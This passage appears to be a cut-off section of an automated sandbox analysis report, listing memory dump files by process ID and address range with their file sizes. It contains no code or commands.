                                                                                                                                                                                          • memory/4580-280-0x00000000027D0000-0x00000000027D1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4584-199-0x0000000001870000-0x0000000001872000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8KB

                                                                                                                                                                                          • memory/4584-198-0x00007FFCFFB60000-0x00007FFD00621000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            10.8MB

                                                                                                                                                                                          • memory/4584-168-0x0000000000FE0000-0x0000000000FE8000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            32KB

                                                                                                                                                                                          • memory/4596-283-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            128KB

                                                                                                                                                                                          • memory/4660-263-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4660-235-0x0000000000B60000-0x0000000000B74000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            80KB

                                                                                                                                                                                          • memory/4660-261-0x00000000734B0000-0x0000000073C60000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            7.7MB

                                                                                                                                                                                          • memory/4736-298-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            128KB

                                                                                                                                                                                          • memory/4896-290-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            128KB

                                                                                                                                                                                          • memory/4944-227-0x00000000007FD000-0x0000000000824000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            156KB

                                                                                                                                                                                          • memory/4944-233-0x00000000007FD000-0x0000000000824000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            156KB

                                                                                                                                                                                          • memory/4944-258-0x00000000005F0000-0x0000000000634000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            272KB

                                                                                                                                                                                          • memory/4944-262-0x0000000000400000-0x000000000048C000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            560KB